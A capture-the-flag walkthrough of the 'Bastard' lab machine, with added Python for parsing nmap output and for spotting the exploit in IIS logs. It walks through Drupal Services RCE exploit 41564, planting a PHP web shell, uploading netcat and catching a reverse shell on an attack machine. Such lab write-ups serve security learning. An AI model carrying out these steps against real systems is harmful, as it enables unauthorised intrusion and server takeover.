Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.9 All
All: Runs all the scans consecutively.
We get back the following result.
Running all scans on 10.10.10.9
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.32 seconds
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:57 EST
Nmap scan report for 10.10.10.9
Host is up.
All 1000 scanned ports on 10.10.10.9 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 202.50 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:01 EST
Initiating Parallel DNS resolution of 1 host. at 11:01
Completed Parallel DNS resolution of 1 host. at 11:01, 0.02s elapsed
Initiating SYN Stealth Scan at 11:01
Scanning 10.10.10.9 [65535 ports]
....
Nmap scan report for 10.10.10.9
Host is up (0.045s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 264.79 seconds
Raw packets sent: 131270 (5.776MB) | Rcvd: 274 (17.620KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:05 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.13 seconds
Note: The gobuster, nikto and droopescan scans kept timing out. The web server does not seem able to handle the volume of requests these tools send.
We have three open ports.
Port 80: running Drupal 7
Port 135 & 49154: running Microsoft Windows RPC
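As an added example (not part of the original writeup), here is a small parser for the nmap normal-output service table shown above, so the open ports, versions and NSE script output (http-generator, http-methods, robots entries) can be pulled into structured records instead of read by eye. The sample text is a constructed, trimmed copy of the Basic Scan output.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the service table from the Basic Scan above, trimmed.
SAMPLE = """\
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
|_/includes/ /misc/ /modules/ /profiles/ /scripts/
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_RE = re.compile(r"^\s*([a-z0-9.-]+):\s*(.*)$")  # "name: value" opener

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: dict = field(default_factory=dict)  # NSE script -> output lines

def parse_nmap(text):
    """Parse nmap normal output into Service records with NSE output attached."""
    services, script = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            services.append(Service(int(m[1]), m[2], m[3], m[4], (m[5] or "").strip()))
            script = None
        elif services and line.startswith("|"):
            body = line[1:].lstrip("_")          # drop the "| " / "|_" margin
            sm = SCRIPT_RE.match(body)
            if sm:                               # a new script block starts
                script = sm[1]
                services[-1].scripts[script] = [sm[2]] if sm[2] else []
            elif script:                         # continuation of the current block
                services[-1].scripts[script].append(body.strip())
    return services

def open_ports(services):
    return [s.port for s in services if s.state == "open"]
```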
Before we move on to enumeration, let’s make some mental notes about the scan results.
Port 80 is running Drupal 7, which I know from the Hawk box is vulnerable to a number of exploits. Most of these exploits are associated with the modules installed on Drupal. Since droopescan is not working, we'll have to figure out manually whether these modules are installed.
Enumeration
Visit the web application in the browser.
It's running Drupal, which is a free and open-source content management framework. Let's look at the CHANGELOG to view the exact version.
It’s running Drupal 7.54.
Let's try to find credentials for this application. I googled "default credentials drupal", but I didn't find anything useful. Next, I tried common credentials such as admin/admin and admin/password, but was not able to log in.
When the target is off-the-shelf software, I usually don't run a brute force attack against it, because it probably has a lockout policy in place.
Next, run searchsploit.
searchsploit drupal 7
Let's view exploit number 41564.
searchsploit -m 41564
It links to this blog post. It is a deserialization vulnerability that leads to Remote Code Execution (RCE). Looking at the code, we see that it sends its requests to the path /rest_endpoint to conduct the exploit.
There are also two comments that are not wrapped properly that you’ll need to fix.
Run the exploit.
php 41564.php
We get an "Uncaught Error: Call to undefined function curl_init()" error message. That's because we don't have php-curl installed on our Kali machine.
apt-get install php-curl
Now the exploit should work.
root@kali:~/Desktop/htb/bastard# php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/dixuSOspsOUU.php
Perfect! It created two files: session.json and user.json. View the content of user.json.
It gives us the hashed password of the admin user. We could run it through a password cracker; however, we don't need to, because the session.json file gives us a valid session cookie for the admin user.
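From the defender's side, this exploit leaves a recognisable trace in the IIS logs: a POST to the Services REST endpoint followed moments later by a request to a freshly written PHP file in the web root (the "File written" line above). The following Python is an added detection example, not code from the writeup or from the Services project; the W3C log field order, the /rest_endpoint name (it is configured per site), the five-minute window and the log lines themselves are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed IIS W3C log excerpt mirroring the steps above. Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip
# cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-02-16 16:05:00 10.10.10.9 GET /index.php - 80 - 10.10.14.30 Mozilla/5.0 200 0 0 30
2020-02-16 16:10:01 10.10.10.9 GET /CHANGELOG.txt - 80 - 10.10.14.7 Mozilla/5.0 200 0 0 45
2020-02-16 16:12:07 10.10.10.9 POST /rest_endpoint/user/login - 80 - 10.10.14.7 Mozilla/5.0 200 0 0 110
2020-02-16 16:12:09 10.10.10.9 POST /dixuSOspsOUU.php - 80 - 10.10.14.7 Mozilla/5.0 200 0 0 8
2020-02-16 16:40:00 10.10.10.9 GET /node/4 - 80 - 10.10.14.7 Mozilla/5.0 200 0 0 12
"""

# PHP entry points that legitimately sit in a Drupal 7 web root.
KNOWN_ROOT_PHP = {"/index.php", "/cron.php", "/install.php", "/update.php",
                  "/xmlrpc.php", "/authorize.php"}
REST_PREFIX = "/rest_endpoint/"   # assumed: the Services endpoint name is site-specific
WINDOW = timedelta(minutes=5)     # assumed: how close the two events must be

def parse_iis(text):
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):   # skip header/directive lines
            continue
        f = line.split()
        rows.append({"ts": datetime.strptime(f[0] + " " + f[1], "%Y-%m-%d %H:%M:%S"),
                     "method": f[3], "path": f[4], "client": f[8], "status": int(f[10])})
    return rows

def detect(rows):
    """Return (severity, client, path) findings in time order."""
    findings, last_rest = [], {}          # client -> time of its last REST POST
    for r in sorted(rows, key=lambda r: r["ts"]):
        if r["method"] == "POST" and r["path"].startswith(REST_PREFIX):
            last_rest[r["client"]] = r["ts"]
            findings.append(("info", r["client"], r["path"]))
        elif (r["path"].endswith(".php") and r["path"].count("/") == 1
              and r["path"] not in KNOWN_ROOT_PHP and r["status"] == 200):
            # A served PHP file that is not a stock Drupal entry point; if the same
            # client just hit the REST endpoint, treat it as a dropped web shell.
            recent = last_rest.get(r["client"])
            sev = "high" if recent and r["ts"] - recent <= WINDOW else "medium"
            findings.append((sev, r["client"], r["path"]))
    return findings
```

The "info" hit on its own is normal traffic for a site that uses the Services module; the sequence is what matters.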
Let’s add the cookie to our browser using the Cookie Manager plugin.
Then refresh the page.
We’re logged in as admin! Click on the Modules tab and check if the PHP filter is enabled. It is. This means we can add PHP code.
Click on Add new content on the welcome page > click on Basic page. In the Title field add the value "shell". In the Body field add the simple PHP shell to upload/execute code from the following link. Make sure to include the "<?php ?>" tags and change the IP address to that of your attack machine. This gives us the ability to both execute and upload files. In the Text format field choose the option PHP code. Then hit Save.
In my case the entry created is under the path /node/4. Let’s test it out.
We have code execution! I can't seem to use PowerShell from here, so what we'll do is upload netcat to the box and then use it to send a reverse shell back to our attack machine.
Run the systeminfo command.
It’s a 64-bit operating system. Download the 64-bit executable of netcat from here. Start up a python server.
python -m SimpleHTTPServer 7777
Upload it using the fupload parameter.
Then set up a listener on the attack machine.
nc -nlvp 1234
Use the uploaded netcat executable to send a reverse shell to our attack machine.
We get a shell!
root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.9] 60572
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
Grab the user.txt flag.
Now we need to escalate privileges.
Privilege Escalation
We know from the output of the systeminfo command the OS name and version.
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
The Arctic box was running the same OS, so I used the same exploit, MS10-059, to escalate privileges on this box. I won't explain it here; please refer to the Arctic writeup.
Grab the root.txt flag.
Lessons Learned
What allowed me to gain initial access to the machine and escalate privileges was exploiting known vulnerabilities that had patches available. So it goes without saying: you should always update your software!